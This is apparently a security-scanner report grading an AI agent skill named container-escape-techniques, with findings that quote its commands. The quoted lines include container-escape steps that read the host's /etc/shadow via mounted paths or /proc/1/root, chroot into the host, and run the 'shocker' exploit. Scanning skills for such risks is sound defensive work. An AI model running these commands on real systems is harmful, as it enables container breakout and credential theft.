container-escape-techniques
github.com/yaklang/hack-skills
Scanned Thu, 28 May 2026 17:29:02 GMT
Scan ID crawl-ck0wknz51n3kpfffpbcf31ci · 2ms
C
SCORE 55 / 100
Verdict: Proceed with caution

5 high-severity findings.

This skill reads protected filesystem locations plus 5 other issues listed below.

0 critical · 5 high · 1 medium · 6 rules passed

Why grade C?

score · 55 / 100

The current grade reflects 5 high-severity findings (3+ HIGHs → C).

0 CRIT · 5 HIGH · 1 MED · 0 LOW
To reach a higher grade
  • B
    Reach B · target score 75

    Resolve 3 of 5 HIGH (cap is 2).

  • A
    Reach A · target score 95

    Resolve all 5 HIGH.

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Findings · ordered by severity

high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 78 · CWE-552
76
77  # Access host filesystem
78  cat /mnt/host/etc/shadow    ← sensitive path — credential-exfiltration vector
79  chroot /mnt/host bash
80  ```
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 98 · CWE-552
96  # Access host processes via /proc
97  ls /proc/1/root/ # Host root filesystem
98  cat /proc/1/root/etc/shadow    ← sensitive path — credential-exfiltration vector
99
100  # Inject into host process
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 156 · CWE-552
154  # Works when DAC_READ_SEARCH capability is granted
155  gcc shocker.c -o shocker
156  ./shocker /etc/shadow # Read host file    ← sensitive path — credential-exfiltration vector
157  ```
158
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 192 · CWE-552
190  cat > /cmd << 'EOF'
191  #!/bin/sh
192  cat /etc/shadow > /output 2>&1 # Or: reverse shell    ← sensitive path — credential-exfiltration vector
193  EOF
194  chmod +x /cmd
high
Sensitive filesystem path referenced
The skill references a path (`/etc/shadow`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.
rule: filesystem-overreach · line: 235 · CWE-552
233  # Access host processes directly:
234  ls /proc/1/root/ # Host's root filesystem
235  cat /proc/1/root/etc/shadow    ← sensitive path — credential-exfiltration vector
236
237  # Inject into host process:
med
No capability manifest declared
The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.
rule: no-manifest
skillox.io/r/crawl-ck0wknz51n3kpfffpbcf31ci